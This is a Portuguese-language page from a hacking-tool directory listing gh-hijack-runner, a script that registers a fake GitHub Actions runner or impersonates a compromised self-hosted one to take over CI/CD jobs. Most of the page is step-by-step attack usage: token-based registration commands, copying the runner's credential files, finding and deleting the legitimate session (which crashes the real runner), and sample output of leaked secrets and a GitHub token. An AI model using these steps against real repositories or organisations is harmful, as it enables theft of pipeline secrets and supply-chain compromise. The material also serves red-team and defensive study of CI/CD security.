Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
gh-hijack-runner — Um script Python para criar um GitHub runner falso e sequestrar jobs de pipeline para vazar segredos de CI/CD. | Kitploit
Ferramentas/GitHubGitHub/synacktiv/gh-hijack-runner
ExploraçãoExfiltração de DadosTestes de PenetraçãoSegurança na NuvemSegurança da Cadeia de SuprimentosRed Teaming
GitHubsynacktiv/gh-hijack-runner

gh-hijack-runner

Um script Python para criar um GitHub runner falso e sequestrar jobs de pipeline para vazar segredos de CI/CD.

Ver Repositório
335há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

gh-hijack-runner

Um script Python para criar um runner falso do GitHub e sequestrar jobs de pipeline para vazar segredos de CI/CD.

Descubra mais detalhes no seguinte post do blog: https://www.synacktiv.com/publications/hijacking-github-runners-to-compromise-the-organization

Exploração

Se você conseguir obter um token de registro ou obter execução remota de código em um runner auto-hospedado do GitHub, você pode criar ou assumir o controle de um runner do GitHub. Isso permitirá que você acesse todos os segredos passados para esse runner.

Usando um token de registro, você pode registrar um runner com o label ubuntu-latest, obtendo acesso a jobs originalmente destinados aos runners provisionados pelo GitHub. Isso permite comprometer qualquer workflow que use esse método.

root@kitploit:~
$ gh-hijack-runner.py --registration-token AOTAA3QWE1A5QB6JFECOKQDGEVOVC --url https://github.com/syncicd/CICD --labels ubuntu-latest
[+] Session ID: b66b76a8-e7db-4a14-a2ea-207b1c8cb94d
[+] AES key: BTIk+FT2hRb[...]HN1kkg==
[+] New Job: init (messageId=2)
- REPO_SECRET: repo secret
- SUPER_SECRET: super secret password
- system.github.token: ghs_RqDY21GqZ0OYvM8ImVpAB0B9o7TBQR4Dq2HC

Instalação

root@kitploit:~
$ pip install -r requirements.txt 

Uso

A partir de um token de registro

Se você conseguir um token de registro para registrar um runner auto-hospedado para um repositório ou organização, você pode registrar o runner falso do GitHub com este comando:

root@kitploit:~
$ gh-hijack-runner.py --registration-token AOTAA3QWE1A5QB6JFECOKQDGEVOVC --url https://github.com/syncicd/CICD --labels ubuntu-latest

Pode ser um token de registro de organização ou de repositório.

A partir das credenciais de um runner GitHub existente

Com execução arbitrária de código em um runner auto-hospedado, você precisa exfiltrar três arquivos para assumir a identidade do runner comprometido:

root@kitploit:~
root@9f8f6f1fdfa6:/actions-runner# pwd
/actions-runner
root@9f8f6f1fdfa6:/actions-runner# ll
-rw-r--r-- 1 root   root     266 Apr 21 12:27 .credentials
-rw------- 1 root   root    1667 Apr 21 12:27 .credentials_rsaparams
-rw-r--r-- 1 root   root     325 Apr 21 12:27 .runner
[...]

Para buscar jobs, o runner estabelece uma sessão com o GitHub. Cada runner só pode manter uma sessão. Para criar uma nova sessão, você precisa excluir a sessão atual estabelecida pelo runner legítimo. O ID da sessão pode ser encontrado aqui:

root@kitploit:~
root@9f8f6f1fdfa6:/actions-runner# cat _diag/* | grep -i session
[...]
[2024-04-21 18:03:46Z INFO MessageListener] Message '5' received from session 'aab007e0-eedd-4c1b-96b4-a7c2c128c31a'.

/!\ Excluir a sessão atual fará o runner legítimo crashar /!\

Então, você pode excluir a sessão atual:

root@kitploit:~
$ gh-hijack-runner.py --rsa-params credentials_rsaparams.json --credentials credentials.json --runner runner.json --delete-session-id aab007e0-eedd-4c1b-96b4-a7c2c128c31a
[+] Session aab007e0-eedd-4c1b-96b4-a7c2c128c31a deleted.

Por fim, você pode sequestrar este runner:

root@kitploit:~
$ gh-hijack-runner.py --rsa-params credentials_rsaparams.json --credentials credentials.json --runner runner.json                                                         
[+] Session ID: 3c88c6f7-5764-4121-b9bf-2536ee2539b7
[+] AES key: eLN3rhf3D[...]UHewLw==
[+] New Job: init (messageId=2)
- REPO_SECRET: repo secret
- SUPER_SECRET: super secret password
- system.github.token: ghs_RqDY23GqZ0OYvM8ImVpAB0B9o7TBQR4Dq2HC

Observe que para runner auto-hospedado efêmero isso não funcionará.

Ajuda

root@kitploit:~
$ gh-hijack-runner.py --help
Hijack GitHub runners                

Usage:
    gh-hijack-runner.py [options] --registration-token <token> --url <url> [--labels <labels> --ephemeral --rsa-params <rsa> --credentials <credentials> --runner <runner>]
    gh-hijack-runner.py [options] --rsa-params <rsa> --credentials <credentials> --runner <runner> [(--session-id <session> --aes-key <key>)]
    gh-hijack-runner.py [options] --rsa-params <rsa> --credentials <credentials> --runner <runner> --delete-session-id <session>
    

Options:
    -h --help                               Show this screen.
    --version                               Show version.
    -v, --verbose                           Verbose mode
    --output <folder>                       Save data to output file
    --runer-name <name>                     Runner name
    --runner-group <name>                   Runner group name
    --last-Message-id <id>                  Last message ID

Args:
    --registration-token <token>            Token used to register a runner
    --url <url>                             Full repository or org URL
    --rsa-params <rsa>                      Path to .credentials_rsaparams file
    --credentials <credentials>             Path to .credentials file
    --runner <runner>                       Path to .runner file
    --session-id <session>                  Already running session id
    --aes-key <key>                         Base64 encoded AES key associated with a session id
    --labels <labels>                       Labels used for registration (ubuntu-latest,customrunner)
    --ephemeral                             Create ephemeral runner
    --delete-session-id <session>           Delete session. Warning: It will crash the related GitHub runner
    

Examples:
    $ gh-hijack-runner.py --registration-token AOTAA3TOI7SACAVKBDWEQN3F5IEO2 --url https://github.com/org/repo
    $ gh-hijack-runner.py --rsa-params credentials_rsaparams.json --credentials credentials.json --runner runner.json

Author: @hugow

Créditos

  • @karimpwnz pela criptografia
  • @0xn3va pela parte de exclusão de sessão
  • @frichette_n pela ideia original no GitLab
Baixar ferramenta